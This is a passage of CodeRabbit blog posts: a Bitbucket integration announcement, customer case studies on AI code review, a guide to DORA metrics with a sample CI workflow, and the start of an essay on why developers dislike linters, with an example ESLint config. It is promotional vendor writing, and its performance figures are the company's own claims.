Tying It All Together Good documentation isn't about perfection – it's about building bridges between today's solutions and tomorrow's problems. While we can't eliminate the challenge of documentation, we can make it more manageable through small, consistent steps and a shift in team culture. * Start with meaningful comments that explain the "why" * Make documentation updates part of your PR process * Use READMEs effectively, even for internal projects * Embrace visual aids when text isn't enough * Remember, outdated docs are worse than no docs Next time you're about to skip documentation, remember: you're not just writing it for others – you're writing it for your future self. Because in six months, we're all strangers to our own code. At [CodeRabbit](https://coderabbit.ai), we believe in iterative improvement of code quality. For example, we generate contextual code documentation on every pull request. This feature is currently in beta. Try generating code documentation by signing up for a free trial!

CodeRabbit now supports AI Code Reviews with Bitbucket Cloud

Sahil Mohan Bansal — Tue, 04 Feb 2025 00:00:00 GMT

We are thrilled to announce that CodeRabbit [now supports](https://docs.coderabbit.ai/platforms/bitbucket-cloud/) AI Code Reviews with Bitbucket Cloud! This integration, currently in beta, delivers a wider choice of supported Git platforms including GitHub, GitLab, Azure DevOps, and Bitbucket. CodeRabbit’s AI Code Reviews help customers automate the first pass of code reviews, reduce manual time spent in the review cycle, catch bugs and issues that can be overlooked due to human error, and improve the overall quality of their code. With support for Bitbucket Cloud, we are making it even easier for developers to automate away manual and tedious tasks, thus freeing up their time to focus on what they care about: developing new features. ### **Benefits of using CodeRabbit:** * **Automated code reviews:** automatically reviews your code and identifies potential issues, such as bugs, security vulnerabilities, and refactoring opportunities. * **Best-in-class reviews:** logical reasoning capabilities provided by Gen-AI models integrated with Linters deliver a high signal-to-noise ratio for best-in-class AI reviews * **Configurable Learnings:** Your code reviews are customizable to your specific coding standards. AI automatically learns over time and improves future reviews * **Docstrings:** Save time with unit-test insertion and docstring generation. Focus developer time on more productive activities while automating tedious tasks * **Just minutes to get started:** just give access to your Bitbucket, create a new PR, and AI code reviews will kick in automatically Customers who have implemented AI code reviews have reported * 2x-4x faster PR merge time * 25% or more reduction in the amount of dev time spent on code reviews * reduction in the number of bugs in production in the first week after implementing CodeRabbit *“What sets CodeRabbit apart is its deep understanding of code structure through AST analysis. It's not just pattern matching - it's intelligent code comprehension that integrates seamlessly into our existing workflows” – Ron Efroni, Founder, Floxdev* Check out more [customer testimonials](https://www.coderabbit.ai/customers). ### **How to get started with CodeRabbit and Bitbucket:** 1. Start a free trial or log in to your existing account. Select Bitbucket as your Git provider at login. 2. Create a new Bitbucket user as a service account and name it “CodeRabbit.” Then, associate this user with the workspace to which you would like to give CodeRabbit access. 1. Generate an App Password to enable integration between CodeRabbit and your Bitbucket repositories. Enter the App Passport in the CodeRabbit UI. This will automatically configure the required webhook for seamless integration. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/15dd259a1bc88d46ddbba9a67c3825c895f9cd8c9ecc6fc271b01d3ea528916c_10b189cbbc.png) *Login with Bitbucket as your Git provider* ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f67e05da0af45eaa96c659cdd71340ef955857f732584fc1cb0b16c7df3b69a1_d5f89ff0c8.png) *Enter your App Password in the CodeRabbit UI* You can read more [detailed documentation](https://docs.coderabbit.ai/platforms/bitbucket-cloud/) on the Bitbucket integration and join us on our [Discord server](https://discord.gg/coderabbit) for real-time support. Please note that Bitbucket support is currently in beta, so there may be a few kinks that will be resolved over time. Please report any issues on the “[Bitbucket Cloud Support](https://discord.com/channels/1134356397673414807/1334660150623076473)” discord channel. Start your [14-day free trial](https://app.coderabbit.ai/login?free-trial) today and implement AI Code Reviews to immediately improve your code quality, reduce bugs in production, and free up developer time.

From Manual Reviews to AI-Powered Insights: The Linux Foundation's Code Review Transformation

Manpreet Kaur — Wed, 29 Jan 2025 00:00:00 GMT

### **At a Glance:** **Primary contact:** David Deal, Director of Platforms **Coding languages used:** Golang, Python, Angular, TypeScript **Challenge:** Developers spend excessive time on error-prone manual code reviews. **Key Result:** Freeing up 25% of developer time, letting them build more features. [The Linux Foundation](https://training.linuxfoundation.org/?campaignid=21372675077&adgroupid=171974510868&creative=704304945812&matchtype=b&network=g&device=c&keyword=the%20linux%20foundation&hsa_acc=8666746580&hsa_cam=21372675077&hsa_grp=171974510868&hsa_ad=704304945812&hsa_src=g&hsa_tgt=kwd-300730908910&hsa_kw=the%20linux%20foundation&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAs5i8BhDmARIsAGE4xHzjJLJXu6A1FpiM7yWhog83EhcEZdUw3jAHO_Jx8QuC85B3t8EWh3IaAjoDEALw_wcB&utm_source=google&utm_medium=paid-search&utm_campaign=24q2-evergreen-lf_training&utm_term=tnc-na-search-lf-brand&utm_content=eg_rsa&utm_term=the%20linux%20foundation&utm_campaign=tnc-na-search-lf) is a global non-profit that supports various open-source projects that help customers build modern web applications by unlocking the power of shared technology. It hosts and supports over 200 open-source projects, including CNCF, PyTorch, OpenJS, and Automotive Grade Linux. With an engineering team of 40-60 engineers, spread globally, the organization provides a neutral space for developers and companies to collaborate. The team develops and maintains tools and services for project memberships, telemetry data management, and IT infrastructure. ## **Business Challenges - Manual Code Reviews are a Bottleneck** The Linux Foundation faced the challenge of a distributed software development team, where code reviews were slow, inefficient, and error-prone. Code reviews were done manually by technical leads and peers, with often two cycles to complete the review and the Pull Request (PR) being ready to merge. This manual process introduced delays especially when engineers in different time zones were waiting for feedback. They were looking for tools to identify inconsistencies and gaps in code quality without burdening team leads. ### **Key Challenges:** * Manual code reviews have high variance and are error-prone due to critical bugs being missed * Manual code reviews are limited by individual reviewer knowledge and lack the consistency needed for top-quality engineering teams * Distributed teams with engineers in different time zones lead to delayed code reviews * Gaps in code quality end up heavily burdening the team leads when they have to take time out from developing new features ## **Improving Dev Productivity with AI Code Reviews** The Linux Foundation greatly improved its software development workflow after adopting AI Code Reviews with CodeRabbit. The onboarding was quick (just a few clicks), and it took less than a day to set up, integrate with the Foundation’s GitHub repositories, and receive helpful AI code review recommendations. With CodeRabbit’s SaaS deployment model and support from the customer success team, the setup was completed very quickly. CodeRabbit’s AI code reviews freed up the engineering team lead’s time and provided a high-quality and automated first pass of the review cycle. Some examples of issues identified by AI code reviews include bug fixes, missed documentation, unit test insertion, and code refactoring suggestions. These are the key features of CodeRabbit that the Linux Foundation used: **Key Features from AI Code Reviews** **Always-on code reviews:** * CodeRabbit’s AI delivers senior engineer-level code reviews that are always available, just one click away. Unlike human reviewers, it eliminates the need for engineers to wait for peers or technical leads in different time zones, ensuring an efficient workflow. **PR Summaries and Suggestions:** * Concise and easy-to-understand summaries of complex changes in a PR with a walkthrough of changes in each file associated with the PR. * Line-by-line recommendations for optimizing code quality with refactoring suggestions. **1-click for bug fixes:** * Immediately identify bugs and errors before they make it to production * 1-click to accept AI suggestions on fixing bugs and automatically commit the fix to the PR. **Extensive Integrations:** * A wide array of languages and frameworks are supported including: \- Golang, Python, Angular, TypeScript, Terraform and SQL. * Out-of-the-box integrations with static analyzers and linters ensure CodeRabbit is a one-stop shop for code reviews. **Docstrings & Unit Tests:** * CodeRabbit’s AI reviews identified documentation gaps and recommended inserting unit tests, especially in SQL and DBT testing frameworks. * Recommendations for Terraform files improved infrastructure management. **Automated Learnings**: * CodeRabbit’s AI learns over time and identifies certain best practices specific to a repository. * Engineers can see and tweak the automated learnings by providing contextual feedback to the chatbot, further improving the quality of the AI code reviews. *“CodeRabbit has proven invaluable in uncovering discrepancies between our documentation and actual test coverage. Highlighting inconsistencies like missing null checks or mismatched value ranges significantly improved the quality of our codebase and prevented numerous potential issues.” —* **David Deal, Senior Director of Engineering,** [**The Linux Foundation**](https://www.linuxfoundation.org/)**.** **Conclusion** The Linux Foundation is excited to roll out CodeRabbit to additional teams in their organization. They are also looking forward to using CodeRabbit’s upcoming analytics features like tracking PR merge time and human comments reduction to more easily measure the impact of AI in speeding up their dev workflows. They are also excited to see how the AI learns over time as more users engage with the chatbot to reinforce learnings specific to their coding standards in their review cycle. The Linux Foundation’s adoption of CodeRabbit shows the power of AI code reviews, driving team efficiency and delivering a 25% reduction in the manual time spent on code reviews. CodeRabbit automates the boring stuff and provides actionable insights so the engineers can focus on innovation and maintaining quality in open-source projects. **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes to get started, and no credit card is required to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

Downstream impact of AI on Engineering Analytics and DORA

Aravind Putrevu — Fri, 24 Jan 2025 00:00:00 GMT

Top-performing engineering teams know the impact of hitting the right metrics, especially when it comes to speed, quality, and resilience. According to the [2024 State of DevOps report](https://cloud.google.com/resources/devops/state-of-devops), the best teams achieve lead times as low as 1 minute 29 seconds, and their incident recovery times average just 33.95 minutes. But how many organizations can reach those benchmarks? And more importantly—what does it take? **DORA (DevOps Research and Assessment)** metrics exist to answer these questions. They zero in on core performance metrics such as **deployment frequency**, **lead time for changes**, **mean time to restore (MTTR),** and **change failure rate**. The [State of DevOps report](https://cloud.google.com/resources/devops/state-of-devops) has a a dedicated section pointing out AI's impact on Developer Productivity. AI tools help teams build features faster, leading to better **code reviews**, **real-time diagnostics, feedback cycles**, and **critical insights** into your workflows, which can positively affect your team's scores around each metric. This guide will explain DORA metrics and its four key metrics and demonstrate how AI can help you improve your team’s performance across these metrics. ## What Are DORA Metrics? DORA metrics provide a quantitative method for measuring your software development and deployment cycle effectiveness. They try to provide some answers to the question, “What makes the best-performing software engineering teams work?” To understand DORA metrics, you must understand why it all started. According to *Jez Humble*, one of the co-founders of DORA, the organization was founded to help companies improve their software delivery performance through scientific measurement, benchmarking, and personalized recommendations. It started as a collaboration and eventually became an independent entity before being acquired by Google Cloud in December 2018. After analyzing thousands of survey responses from professionals over a long period of time, the team identified four key metrics: **deployment frequency, lead time for change, change failure rate,** and **mean time to restore**; ![DORA Metrics](https://victorious-bubble-f69a016683.media.strapiapp.com/30bf8abd79ea96d0ddd519a95741f3f85c2e0d22b744d0f386401ea1b6e8775c_1843d3c3d6.png) These key metrics have now become what we know today as the DORA metrics. ## #1: The Deployment Frequency Deployment frequency measures the number of times an organization deploys code changes to production over a specific period. This period could be daily, weekly, monthly, or any other interval that makes sense for your team. This metric reflects the agility of your release cycle and indicates how well your team can deliver improvements, new features, or fixes to users. Having a high deployment frequency indicates a fast, efficient development process, while a low frequency can signal bottlenecks and inefficiencies in your continuous integration and delivery processes or pipeline. ### **How to Measure Your Deployment Frequency** Calculating deployment frequency is straightforward. The formula involves dividing the number of deployments by the length of the measurement period. For example, if a team deploys 20 times in a week, their deployment frequency is 20 deployments per week. The formula is: $$Deployment\ Frequency = Number\ of\ Deployments\ /\ Time\ Period$$ The `Time Period` is the deployment interval selected by you or your team. ### **Factors Affecting Your Deployment Frequency** Whether using DevOps practices or not, your deployment has to go through a process or pipeline. With the introduction of Continuous Integration/Continuous Deployment (CI/CD) and Infrastructure as Code (IaC), your team can automate most development and operation processes, such as running tests, deploying applications, and even provisioning infrastructures. Additionally, approaches like the GitOps workflow allow your team to manage these processes via a Git repository. In the GitOps workflow, after you’ve committed your code to a Git repository, the CI/CD pipeline takes over and executes the rest of the processes. ![An illustration of the commit to deployment pipeline](https://victorious-bubble-f69a016683.media.strapiapp.com/756c0da5dd76eb1e010af0377007b382c676524c381c6af596af786435ed0f7a_f72b7048f4.png) However, if the pipeline is not properly created or there are issues with any steps created within the pipeline configuration, it can slow down how quickly your team can push out updates. IaC configurations usually need to be reviewed before they reach the production environment to prevent security issues, misconfiguration, and more. ### **How Can You Increase Your Deployment Frequency?** Modern AI tools can significantly improve your deployment frequency through automated code reviews and infrastructure analysis. These tools integrate with CI/CD platforms to [review configurations](https://docs.github.com/en/actions), [detect potential issues](https://docs.coderabbit.ai/tools/actionlint/), and provide actionable insights for improvement. ![Illustration of CodeRabbit linters on configuration files on Git](https://victorious-bubble-f69a016683.media.strapiapp.com/cfc48277b87da1dec6fa1c8e6640d7526902c992a7479a535f74fa2e2c216dad_92c3a2db73.png) For example, when your developer updates test cases and creates a CI pipeline to execute the tests. ```yaml # .github/workflows/ci.yml name: Node.js CI on: push: branches: - main - feat/server pull_request: branches: - main - feat/server jobs: build: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v3 - name: Set up Node.js uses: actions/setup-node@v3 with: node-version: '16' # You can specify your desired Node.js version - name: Install dependencies run: npm install - name: Run tests run: npm test ``` This snippet indicates that the action runs when there is a push or pull request to the **main** and **feat/server** branches. It sets up **Node.js 16** and runs the test. Once the PR is created, AI can spot potentially missed edge cases the user missed and provide suggestions on mitigating them. ![Screenshot of CodeRabbit detecting a Potential issue with the test](https://victorious-bubble-f69a016683.media.strapiapp.com/51847a83fafffd119c37a202bfb5ed616121b35fcc0de5a6afdc3bfa304ee46c_d0b755e7d7.png) In another scenario, your complete infrastructure configuration is stored and managed on Git. Let's say your DevOps engineer creates a PR to update or provision a new resource; AI can quickly review these configuration updates and suggest improvements to secure and streamline the provisioning process. ![Screenshot of CodeRabbit spotting out Security improvements](https://victorious-bubble-f69a016683.media.strapiapp.com/0cbf422dd60975658b9552a4115785e5eeb3be82896317c57488e896e1278081_a5d7546f99.png) With automated configuration reviews and improvement suggestions, you can speed up the process in less time than with the traditional approach. ## #2: Lead Time for Changes Lead time for changes is another essential DORA metric, measuring the time it takes from committing code to deploying it to production. Unlike the Deployment frequency, it measures the efficiency of the DevOps process. Having a high lead time for changes implies that you have a slow code review/code deployment process. The lead time for change is essential because it can help the project teams set realistic deadlines based on the data obtained from these metrics. A lead time of less than a day clearly means that you and your team can deliver new changes for your users within a day. ### **How to Calculate the Lead Time for Changes** To calculate the lead time for a specific change, all you have to do is this: $$Lead\ time\ for\ changes = time\ of\ deployment - time\ of\ code\ commit$$ to get more statistically related data, you can then get the median value. ### **Factors Affecting lead time for changes** One of the major factors that can greatly affect your lead time for changes is the **code review** process. It's the next stage of the development process after the code is committed. Code review is very important as it helps catch bugs and security breaches, improve code standards, and catch code smells. **The Pull request** size is another factor that can affect the lead time for changes. Larger PRs take longer to review, while smaller PRs are easier and quicker to review. The longer the time it takes to review, the longer the lead time. ### **How can you reduce your lead time for changes using AI?** Knowing that the code review process greatly affects the lead time for change, automating it is one of the best ways to reduce it. For instance, your engineer submits a **pull request (PR)** for a new feature. Traditionally, this PR has to undergo peer reviews to catch bugs or code smells before being merged into the production environment. You can augment the traditional peer-review process by letting the AI Code Review tools detect the PR as soon as it's submitted and begin an AI-driven code review for the changes made. It also provides real-time diagnostics and actionable suggestions, allowing you to make the necessary changes promptly. ![Screenshot of some of the actionable review comments from Coderabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/3ec71131099b8521758181e55e967f9ed75fdc361ebc8aac9c10ae227194af43_db0353bd46.png) AI Code Review does a first pass over the PR and provides several automation benefits that can, in turn, reduce your lead time to changes. ## #3: Mean Time To Restore (MTTR) Mean Time to Restore (MTTR) measures the average time it takes to recover from a production incident like an application failure or system outage. MTTR metric is important for understanding how quickly your team can resolve issues that disrupt end users. A lower MTTR indicates faster recovery from incidents, ensuring minimal disruption for users and reducing financial and reputational risks. According to the State of DevOps report, elite teams restore services within an hour, demonstrating their ability to respond quickly to unforeseen issues. Measuring and improving MTTR can help your team identify bottlenecks in their incident management processes and build resilience in their systems. ### **How Do You Calculate MTTR?** To calculate MTTR, use the following formula: $$MTTR = Total\ Downtime / Number\ of\ Incidents$$ For example, if your service experienced 200 minutes of downtime across five incidents in a month, your MTTR would be: $$200 ÷ 5 = 40 minutes$$ This calculation shows how long it takes your team to restore service after an issue. Tracking your MTTR over time can reveal patterns in how your team handles incidents. You can use this information to understand what’s working, identify gaps, and make adjustments to reduce downtime in the future. ### **What Factors Influence MTTR?** Several factors affect how quickly your team can restore service after an incident. Knowing these factors helps identify ways to reduce recovery time: * **Detection Time**: How long does it take to recognize that an incident has occurred? * **Diagnosis Time**: Once detected, how quickly can your team locate the root cause of the problem? This often depends on clear logs, debugging tools, and collaborative troubleshooting processes. * **Fix Time**: How fast can your team create and deploy a resolution? The time required depends on the complexity of the issue, the team’s readiness, and the deployment process. ### **How AI can help reduce MTTR** Modern observability tools use AI to spot and fix problems faster. ML models help detect issues early by spotting unusual system behavior. When something goes wrong, AI can look through logs, metrics, and traces to find the root cause quickly. These tools also make alerts more useful by grouping related issues together and filtering out noise. By learning from past incidents, AI can predict potential failures and suggest fixes based on what worked before. This means teams spend less time searching through logs and more time fixing actual problems. ## #4: Change Failure Rate The **Change Failure Rate (CFR)** measures the percentage of code changes that result in production failures, such as rollbacks or hotfixes. This metric is crucial for understanding the quality and reliability of code changes. A lower CFR indicates better testing, code reviews, and overall deployment practices, while a high CFR often points to insufficient reviews or inadequate testing processes. ### **Calculating Change Failure Rate** To calculate CFR, divide the number of failed changes by the total number of changes deployed: $$CFR = (Number\ of\ Failed\ Changes / Total\ Changes) × 100$$ For example, if a team deploys 50 changes and 2 of them fail, the CFR is: $$(2 ÷ 50) × 100 = 4\%$$ ### Using AI and Issue Tracking to Improve Change Failure Rate Connecting your code review tools with issue trackers like Jira gives you a clearer view of your development process. You can quickly spot bottlenecks and delays when you track code from commit to production. By tying reviews to specific features or fixes, your team stays focused on what matters for each change. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c1f22fbd2bd88de9748868a495e78bfe867c1b22c179fab4faee5d390950ac30_0463f1dda0.png) This connection also helps prevent scope creep – you can easily check if code changes match what was originally requested. When production issues occur, you can look back at similar changes to find and fix problems faster. Over time, you'll spot patterns that help prevent the same issues from happening again. Think of it as a health check for your changes—you see what's working, what's not, and where to focus next. ## Leverage DORA Metrics to Continuously Improve Developer Productivity Now that you understand DORA metrics and how AI tools can help. Here’s what you can do next: * **Check Your Current Metrics**: Start by measuring your team’s deployment frequency, lead time for changes, MTTR, and change failure rate. Identify where you need to improve. * **Use AI Tools in Your Workflow**: Set up tools like CodeRabbit to automate code reviews, check your pipelines, and provide feedback on your processes. Begin by connecting it to your repositories and CI/CD systems. * **Work With Your Team**: Share these metrics with your team and discuss ways to make changes. Use insights from automated code review tools to guide decisions. * **Track Your Progress**: Monitor your metrics to see how your changes work. Use reports and dashboards to identify patterns and adjust your approach. With these steps, you can improve your development process and get better results. Understanding DORA metrics and using automated code review tools like CodeRabbit can help you make data-driven improvements that benefit your team and users. Start by measuring your current metrics, applying what you’ve learned, and tracking your progress. Sign up for a [free trial of CodeRabbit](https://app.coderabbit.ai/login).

CodeRabbit's AI Code Reviews Help BuiltRight Save 25% Developer Time and Boost Efficiency

Sahil Mohan Bansal — Tue, 21 Jan 2025 00:00:00 GMT

Vertical: Technology Services Primary Contact: William Wallace, CEO and Co-Founder Coding Language: JavaScript [BuiltRight](https://rebolthq.com) is an AI-powered website builder for businesses that provide home services. BuiltRight uses AI to deliver fully SEO optimized websites and automated social media posts for their customers within minutes with minimal effort from the end-user. They leverage AI heavily in their own product and have been looking at other AI tools to optimize their internal software development process. BuiltRight has a small developer team of less than 5 individuals, utilizing AI to assist their engineers is a key part of their software development strategy allowing them to operate at a high quality with a lean and nimble team. ### **Business Challenges** Manual code reviews can be error prone and cumbersome, especially when you are operating in a small sized team. Operating in a fast-paced environment with new feature requests coming in quickly and the entire software development cycle being managed by less than 5 engineers, BuiltRight had to figure out how they can augment their manual code reviews with a level of automation that can free up their developers time to focus on building new features and delivering value for their customers, instead of spending that time on manual code reviews. ### **Looking for an AI Code Review Solution** BuiltRight came across CodeRabbit through their listing on [ProductHunt](https://www.producthunt.com/products/coderabbit) when they were searching for new AI tools to aid software development. They were excited by the prospect of using AI to automate the first pass of the code review cycle and reduce the number of human hours spent in the code review process. They applied for the [CodeRabbit startup program](https://www.coderabbit.ai/startup-program) and were able to quickly get started with AI code reviews in less than 10 mins! CodeRabbit delivered on the promise of reducing bugs in production while automating the code review process with the first Github pull request that it was asked to review. Quick to set up, delivering immediate value, freeing up developer time - that’s the power of AI code reviews. ### **CodeRabbit Benefits** BuiltRight implemented CodeRabbit to aid their small but mighty software development team in releasing software features faster with higher quality code. They integrated CodeRabbit’s SaaS app with their GitHub organization, and CodeRabbit enabled their team to: * **Automate first round of code review:** The power of AI allows BuiltRight to automate the first round of the code review process without a human engineer in the loop, freeing up crucial developer time to only focus on more complicated steps in the software development cycle. * **25% time savings vs manual reviews:** AI code reviews helped BuiltRight save about 25% of the total time that their developers were spending on manual code reviews, freeing up crucial developer bandwidth from the code review cycles. * **Reduced bugs & better code quality:** CodeRabbit captured many different types of errors, bugs, type safety issues and copy mistakes during the code review process that could have easily been missed during manual reviews. CodeRabbit also provides contextual code-refactoring suggestions to simplify and improve the overall code quality. * **1-click fixes:** BuiltRight’s engineers leverage CodeRabbit’s integration with Linear and directly commit suggestions and feedback from CodeRabbit with just 1-click directly from the PR where the AI code reviews were processed. "We found CodeRabbit through Product Hunt and gave it a try. It was super quick and easy to get started - took us less than 10 minutes. We are looking forward to using the Learnings feature more to further improve our AI code reviews" - William Wallace, CEO of [BuiltRight](https://rebolthq.com/) ### **Next Steps:** BuiltRight is excited to explore the automated as well as user-reinforced Learnings in CodeRabbit. These learnings are essentially the AI understanding of the context behind the changes in various PRs and creating a series of learnings that are unique to each customer so that it can incorporate those in the next code review cycle. BuiltRight continues to use CodeRabbit and is looking forward to expanding its use to additional team members in the future. **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes, and no credit card is required, to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

Potpie Enhances Code Quality with AI Code Reviews

Aravind Putrevu — Fri, 17 Jan 2025 00:00:00 GMT

## At a Glance * **Company**: Potpie * **Industry**: AI Engineer Agents * **Scale**: 8-10 developers * **Challenge**: Maintaining code quality standards for a growing Open-source project. * **Key Result**: Significant reduction in time for code reviews, and code quality enforcement ## About Potpie [Potpie](https://potpie.ai/) develops [open-source](https://github.com/potpie-ai/potpie) agentic AI automation tools that provide ready-to-use and custom-built agents for engineering tasks. Their platform helps engineering teams automate routine tasks and improve software development workflows. ## The Challenge: Managing Code Quality at Scale As a team developing business-critical agentic AI automation tools, Potpie faced several challenges in their code review process: ### Key Pain Points * **Review Iteration Time**: Slow code review cycles impacted development velocity * **Quality Standards**: Inconsistent enforcement of code quality standards during reviews * **Developer Bottlenecks**: Manual code reviews were dependent on developer availability * **Static Analysis**: While using SonarQube, enforcement of analysis findings wasn't streamlined ## The Solution: AI Code Reviews with CodeRabbit Potpie implemented CodeRabbit’s AI Code Reviews through a simple GitHub integration, immediately enhancing their review process by a few days with several key features: [![Sequence Diagram from a PR Reviewed by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/3096df9a754c2957afecc13f2cbc54219d7c4921049c0d2c9cb4140dd253a139_2439edec61.png)](https://github.com/potpie-ai/potpie/pull/213) ### Automated Code Quality Analysis CodeRabbit provides comprehensive code analysis focusing on: * Missing imports, particularly critical for external contributions * Simplifying complex code changes and modularization suggestions * Static analysis integration and enforcement of code quality standards. ### Smart Prioritization of Code Reviews The platform helps maintain review focus through: * Distinction between nitpicks and actionable comments * Sequence diagrams for better change visualization * Overview of changes in all files included in the PR * "Related PRs" feature for managing conflicting changes ### Streamlined Quality Enforcement CodeRabbit enhances the code review process by: * Providing instant feedback based on static analysis * Ensuring PRs are in better shape before maintainer review * Enforcing efficient coding practices consistently * Maintaining existing code structure standards ## Impact and Results The implementation of CodeRabbit has transformed Potpie's development workflow: ### Key Benefits * **Immediate Impact**: Team saw reduced time to merge PRs from day one of implementing CodeRabbit * **Enhanced Reviews**: More detailed and consistent code reviews * **Maintainer Focus**: Reviewers can concentrate on bigger picture issues * **Quality Standards**: Better enforcement of coding practices ### Process Improvements * **Automated First Pass**: Instant feedback on common issues * **Better PR Quality**: Changes arrive in better shape for maintainer review * **Conflict Management**: Better tracking of related and conflicting changes * **Developer Experience**: Enhanced but familiar workflow ## Summary Potpie's software development team appreciates how CodeRabbit seamlessly integrates into their existing workflow while providing instant, detailed feedback on code changes. By handling routine checks and enforcing coding standards automatically, CodeRabbit allows maintainers to focus on architectural decisions and bigger picture concerns. The team actively uses CodeRabbit alongside other AI-powered tools like Cursor, Warp, and ChatGPT in their development workflow. They're particularly interested in future enhancements that would allow CodeRabbit to serve as an Agentic AI reviewer, automatically perform several coding tasks with great context. CodeRabbit is free for Open-source projects. [Start a free trial](https://coderabbit.ai/).

Postiz Accelerates Open Source Development with AI Code Reviews

Aravind Putrevu — Fri, 10 Jan 2025 00:00:00 GMT

## **At a Glance** * **Company**: Postiz * **Industry**: Commercial Open-source * **Scale**: 1M+ users, 200+ contributors * **Challenge**: Managing code reviews across a large open-source community * **Key Result**: 80% faster review cycles ## **About Postiz** [Postiz](https://postiz.com/) is a leading self-hosted social media platform serving over a million users worldwide. With an active open-source community comprising 40 core contributors and more than 200 community contributors regularly submitting pull requests, Postiz represents the cutting edge of collaborative open-source development. ## **Challenge: Scaling Code Review in an Open Source Environment** As an [open-source project](https://github.com/gitroomhq/postiz-app) experiencing rapid growth, Postiz faced significant challenges in maintaining code quality while keeping their code review process efficient and contributor-friendly. With only two maintainers handling reviews for hundreds of contributors, the traditional manual code review process was becoming unsustainable. ### **Key Pain Points** * **Limited Maintainer Bandwidth**: Two maintainers were responsible for reviewing PRs from over 200 contributors * **Review Cycle Inefficiency**: Multiple review cycles for minor issues created "PR ping-pong," slowing down the PR merge process * **Quality Control at Scale**: Ensuring consistent code quality across contributions from developers with varying levels of expertise * **Detail Management**: Critical but minor issues were often missed during manual reviews, requiring additional revision cycles ## **Solution: AI Code Reviews by CodeRabbit** Postiz added CodeRabbit's AI Code Reviews with their 2-step GitHub integration, immediately transforming their code review process with several key features: ### **Automated First-Pass Reviews** CodeRabbit automatically performs the first-pass of the code review cycle, identifying common issues before maintainers need to get involved. This has been particularly valuable for: * Type definition improvements * Incorporating Refactor Suggestions * Trivial but important issues like: unused imports, naming conventions etc. ### **1-Click Suggestions** CodeRabbit's ability to immediately commit suggested changes has dramatically reduced review iteration cycles. Nevo David, Creator of Postiz, noted, “Using CodeRabbit contributors can quickly implement improvements without waiting for maintainer availability”. [![Developer working with CodeRabbit on the translation feature](https://victorious-bubble-f69a016683.media.strapiapp.com/7dc4503a153891c87379d7cbcbaf95173cf441f71650de6afb814271fb623062_5eda2025f4.png)](https://github.com/gitroomhq/postiz-app/pull/485) ### **Automated Code Quality Checks** CodeRabbit seamlessly integrates with Postiz's existing code quality setup by: * Automatically running ESLint checks based on the project's eslint.json configuration * Enforcing team-specific coding standards through existing lint rules * Converting lint violations into actionable, 1-click fix suggestions * Aggregating and prioritizing feedback from multiple automated tools in one view This automation ensures consistent code quality enforcement across all contributions while respecting the project's established standards. ## **Impact and Results** The implementation of CodeRabbit’s AI Code Reviews has transformed development workflow at Postiz with measurable improvements: ### **Quantitative Benefits** * **Review Speed**: 80% reduction in review cycle time * **Contributor Engagement**: Increased PR merge velocity * **Quality Metrics**: Significant reduction in number of issues after PR merge ### **Qualitative Improvements** * **Enhanced Community Engagement**: Faster feedback cycles keep contributors motivated * **Improved Code Quality**: Consistent automated AI reviews catch issues that might be missed manually * **Maintainer Focus**: Team leads can focus on architectural decisions rather than catching minor issues ## **Summary** The maintainers at Postiz appreciate how CodeRabbit helps streamline their open-source code review process. With their vibrant community contributing across various areas of the TypeScript codebase - from performance optimizations to identifying potential issues and suggesting helpful refactoring improvements - CodeRabbit helps maintainers by using AI to handle initial reviews that catch common patterns. This first-pass automation allows maintainers to focus their expertise on deeper technical discussions and architectural decisions that truly benefit from human insight. The team continues to actively use CodeRabbit and is excited about upcoming features on the roadmap. They're particularly looking forward to planned improvements like code documentation, and IDE Integration. These enhancements will further streamline their open-source development process and help maintain high code quality as their community continues to grow. CodeRabbit is free for Open-source projects. If you would like to use CodeRabbit for your open-source project, you can [get started for free](https://www.coderabbit.ai/) today.

Why developers hate linters?

Aravind Putrevu — Wed, 08 Jan 2025 00:00:00 GMT

Disclaimer: I get it; some of you out there are Linters' biggest fans. But to be clear, this is my humble opinion, not a call to arms! As a senior developer who has worked in a variety of teams, tech stacks, and organizational cultures, I’ve had my fair share of experiences with linters. A linter is a tool that programmatically checks source code for stylistic consistency, potential errors, or departures from a predetermined set of rules. This sounds like a great idea on paper: automate the nagging details of the coding style, catch issues before they become defects, and keep the codebase tidy. In practice, the relationship between developers and linters is far more complicated. Why does this happen? After all, we’re talking about something that should, in theory, help developers write better code. To understand why some developers often end up viewing linters as more of a hindrance than a help, we need to dig deeper into the cultural, psychological, and practical realities of software development. Let’s closely examine the underlying reasons for the tension, drawing on some industry sentiments and the lived experiences of engineers on the ground. ## **Warning Fatigue and False Positives** The concept of “warning fatigue” is well-known in many fields. When people receive too many non-critical or erroneous warnings, they start ignoring them altogether. The same happens with linters. If a linter is configured too strictly, it might flag many issues, many of which are superficial and don’t represent real bugs. Over time, developers start to tune out these warnings. Eventually, meaningful alerts might be lost in the noise. False positives are where the linter incorrectly flags a code snippet or a pattern that is actually fine. A developer can think the tool isn’t configured well or useful with each false positive fix. ```json { "rules": { // Overwhelming style rules "quotes": ["error", "single"], "semi": ["error", "always"], "indent": ["error", 2], "comma-dangle": ["error", "always-multiline"], "arrow-parens": ["error", "always"], "max-len": ["error", { "code": 80 }], // Actually important rules buried in noise "no-eval": "error", "no-implied-eval": "error", "security/detect-object-injection": "error", // False positive generators "no-unused-vars": "error", "no-unreachable": "error", "no-unsafe-optional-chaining": "error", "typescript-no-unused-vars": "error", "@typescript-eslint/no-unused-vars": "error" } } ``` Frankly, false positives and noise from linters are the least of the troubles; linters can cause team friction by creating a style debate. ## **New Sources of Style Debates 